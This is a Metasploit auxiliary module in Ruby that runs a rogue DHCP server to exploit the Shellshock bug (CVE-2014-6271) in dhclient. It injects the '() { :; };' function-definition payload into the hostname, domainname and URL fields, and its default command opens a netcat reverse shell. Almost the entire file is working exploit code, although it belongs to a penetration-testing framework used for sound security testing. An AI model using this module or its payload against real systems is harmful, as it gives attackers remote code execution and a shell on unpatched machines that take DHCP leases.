## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex/proto/dhcp' class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::DHCPServer def initialize super( 'Name' => 'DHCP Client Bash Environment Variable Code Injection (Shellshock)', 'Description' => %q{ This module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets dhclient by responding to DHCP requests with a malicious hostname, domainname, and URL which are then passed to the configuration scripts as environment variables, resulting in code execution. }, 'Author' => [ 'scriptjunkie', 'apconole[at]yahoo.com', # Original DHCP Server auxiliary module 'Stephane Chazelas', # Vulnerability discovery 'Ramon de C Valle' # This module ], 'License' => MSF_LICENSE, 'Actions' => [ [ 'Service' ] ], 'PassiveActions' => [ 'Service' ], 'DefaultAction' => 'Service', 'References' => [ ['CVE', '2014-6271'], ['CWE', '94'], ['OSVDB', '112004'], ['EDB', '34765'], ['URL', 'https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/'], ['URL', 'http://seclists.org/oss-sec/2014/q3/649'], ['URL', 'https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/'] ], 'DisclosureDate' => 'Sep 24 2014' ) register_options( [ OptString.new('CMD', [ true, 'The command to run', '/bin/nc -e /bin/sh 127.0.0.1 4444']) ], self.class) deregister_options('DOMAINNAME', 'HOSTNAME', 'URL') end def run value = "() { :; }; PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin #{datastore['CMD']}" hash = datastore.copy hash['DOMAINNAME'] = value hash['HOSTNAME'] = value hash['URL'] = value # This loop is required because the current DHCP Server exits after the # first interaction. loop do begin start_service(hash) while @dhcp.thread.alive? select(nil, nil, nil, 2) end rescue Interrupt break ensure stop_service end end end end